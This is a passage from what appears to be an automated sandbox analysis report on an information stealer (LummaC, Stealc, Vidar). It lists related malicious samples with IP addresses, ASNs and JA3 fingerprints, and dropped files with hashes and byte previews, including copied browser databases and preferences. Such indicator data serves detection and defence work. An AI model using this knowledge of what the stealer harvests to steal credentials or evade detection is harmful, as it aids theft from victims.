	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
steamcommunity.com	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.199.218.33
	github-scanner.com.ps1	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.199.218.33
	NO1F12CQ9P2GBY42WWECW.exe	Get hash	malicious	Unknown	Browse	23.197.127.21
	KByiiYyiam.exe	Get hash	malicious	LummaC	Browse	23.199.218.33
	B0bHdMDGIN.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	AD3SI7tuzs.exe	Get hash	malicious	LummaC	Browse	92.122.104.90
	HkJrUQS8Oh.exe	Get hash	malicious	LummaC	Browse	23.197.127.21

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	5.161.22.78
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	5.161.22.78
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	iZP1hJhnmz.elf	Get hash	malicious	Mirai	Browse	5.75.234.249
	oKRfguHBrN.xls	Get hash	malicious	Unknown	Browse	95.217.202.210
	7IAKm8NRNK.doc	Get hash	malicious	Unknown	Browse	95.217.202.210
	oKRfguHBrN.xls	Get hash	malicious	Unknown	Browse	95.217.202.210
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	TravellingPositions_nopump.exe	Get hash	malicious	LummaC	Browse	104.21.88.61
	github-scanner.com.ps1	Get hash	malicious	LummaC	Browse	104.21.20.40
	https://yafracrattemo.vercel.app/ru.html	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	172.67.143.204
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	188.114.96.3
	Document-21-41-00.js	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.166.21
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	TravellingPositions_nopump.exe	Get hash	malicious	LummaC	Browse	104.21.88.61
	github-scanner.com.ps1	Get hash	malicious	LummaC	Browse	104.21.20.40
	https://yafracrattemo.vercel.app/ru.html	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	172.67.143.204
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	188.114.96.3
	Document-21-41-00.js	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.166.21
AKAMAI-ASUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	github-scanner.com.ps1	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.199.218.33
	8zzBr1gT31.elf	Get hash	malicious	Mirai	Browse	23.12.35.226
	iZP1hJhnmz.elf	Get hash	malicious	Mirai	Browse	23.214.68.208
	dAlxfXyNm7.elf	Get hash	malicious	Mirai	Browse	23.193.154.219
	9B10a4bkpu.elf	Get hash	malicious	Mirai	Browse	23.51.122.194
	S1WVSiZOLX.elf	Get hash	malicious	Mirai, Moobot	Browse	104.74.38.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	116.203.165.127
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	116.203.165.127
	file.exe	Get hash	malicious	Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	TravellingPositions_nopump.exe	Get hash	malicious	LummaC	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	github-scanner.com.ps1	Get hash	malicious	LummaC	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	Ordem de Compra 457525.xls	Get hash	malicious	Unknown	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	Document-21-41-00.js	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
	Copy0761000025.xlsm	Get hash	malicious	Unknown	Browse	104.21.9.6 172.67.203.61 188.114.96.3 104.21.16.38
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Vidar	Browse	92.122.104.90 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	92.122.104.90 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	92.122.104.90 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	92.122.104.90 45.132.206.251
	Quote 05-302.lnk	Get hash	malicious	FormBook	Browse	92.122.104.90 45.132.206.251
	7IAKm8NRNK.doc	Get hash	malicious	Unknown	Browse	92.122.104.90 45.132.206.251
	KDpdV3MWa3.doc	Get hash	malicious	Unknown	Browse	92.122.104.90 45.132.206.251
	lOT2jncAv8.doc	Get hash	malicious	Unknown	Browse	92.122.104.90 45.132.206.251
	SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe	Get hash	malicious	NetSupport RAT	Browse	92.122.104.90 45.132.206.251
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	92.122.104.90 45.132.206.251

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse
	SecuriteInfo.com.Win32.Evo-gen.12679.2695.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\BKKKEGIDBG.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\BKKKEGIDBG.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	390560
Entropy (8bit):	7.988272312465221
Encrypted:	false
SSDEEP:	6144:1v60lgEVBlU2GTOMzuC/cuVXRCEPZG03ZrkZdlBF4P+/G1GB64iL7yMsEO:1vBLblUlH5LXPZd3Z4ZdlBWPsQGB64iQ
MD5:	F5A1956973DCE107D4C0B6267CE88870
SHA1:	79A19513D7C9CFF939F2881C4172A05DBAEF735B
SHA-256:	7B794C5BDB820791F0359DA90A9A4F258412B8FEEF9C6E6A0411F6AEAD9D3A04
SHA-512:	F42180C75C0AE8DC083C6FFF98A66C0D875FADB400D7945816EA330A54777632A3A7752D3E78B90E45F58ED3D04D6708B1DCEA51D82711356E6D14E405A7C579
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................^.... ........@.. ....................................`.....................................S...................x...(&.......................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................@.......H.........................................................................^N.m.Tl.C.zO3&1V.H.._...&....`{.5...(..."..........UNir[H..c.{..9...i..30...\:.d"D}.ZJ.3H..............f..TW.v..i5.mh.W.z....!......."..t.'....Ll...,).;.V..96.e.F.a.../.T.....x...5....d...,Ur.9.8.~av..\N6..a.$.q....c.....-.....T..M^...)L".....V.....q..>.....Ep..o>.y...R.!....4 ....P.s."..j1....]...HL.lM..D..T.2.T...../..k&].=S..Fq.m..`..N. .+nC.I.U./;V...I..*K.O.pG .k..:.7#...(.

C:\ProgramData\CAEHCFCBKKJD\BFBAAF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\BFIJKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\DGDBAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\DHCAAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\DHCAAE-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\FCAAAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\HDGDHC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\HJDBKJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\IDBKKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\JJDBGD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\CAEHCFCBKKJD\JJJEGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CAEHCFCBKKJD\JJJEGC-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_a39db39b4630feb343fe1c7cafd9fd89a8bf83f8_eeff9feb_53cfc1ab-ee23-40bb-b57a-06d8c21af5ed\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0991284055518067
Encrypted:	false
SSDEEP:	192:Y1LeFy/1+U0PdzgjezEK0xvYzuiFMZ24IO88z:2V1+PPdzgjeKOzuiFMY4IO88
MD5:	870E85855F6BE9C1875D3F1A6DF3A0B2
SHA1:	E48FB0026FF936B117EA53192769A83A89F5FBC6
SHA-256:	C4A8C9D825CAA54FF067236CA74700FEB356C3181950C463F7FB71B2E158D358
SHA-512:	51B2B1B6E3AB73FF366F5A330CD278A43135A8AB308DDC01A7F0598A0278FDAB78111D8E7C32A7BF6F851B32AC04EF29A48D93EFEE8BCB1E92172290E808615D
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.4.1.1.1.3.7.1.3.4.2.9.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.4.1.1.1.3.7.9.6.2.4.2.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.c.f.c.1.a.b.-.e.e.2.3.-.4.0.b.b.-.b.5.7.a.-.0.6.d.8.c.2.1.a.f.5.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.d.1.a.b.7.8.-.f.7.8.1.-.4.5.a.3.-.9.b.3.3.-.d.5.f.a.1.b.d.b.a.2.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.6.8.-.0.0.0.1.-.0.0.1.4.-.8.3.c.5.-.f.7.9.8.4.6.0.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.R.e.g.A.s.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_c9fe7738fae27830a4ff53d329d03f416eef3ad8_eeff9feb_4844976b-f5db-4de9-a8f1-4a0fd9bd729f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0928103762625203
Encrypted:	false
SSDEEP:	192:s1WLeFy/X+Pq0WbkrjezEK0xvYzuiFMZ24IO8Zz:bVX+PxWbkrjeKOzuiFMY4IO8Z
MD5:	8A06ACFD3170857EF11814094B8D4009
SHA1:	ADD4625BD431B0F7F8A4104D95FEDE3C37D6D2AB
SHA-256:	9B6E102A9E36CB40A82110CDBCFB878C4E000C01FB807262A76EAF38A005A316
SHA-512:	7BC588E57D1A924F19BD94E61BE11EF158A08AA9A21DC527419B18C9F55AB2CA8F9B09A631EBF530828F3F328A1835C8A9D396F3D051AA26F9CA2957E401800D
Malicious:	true
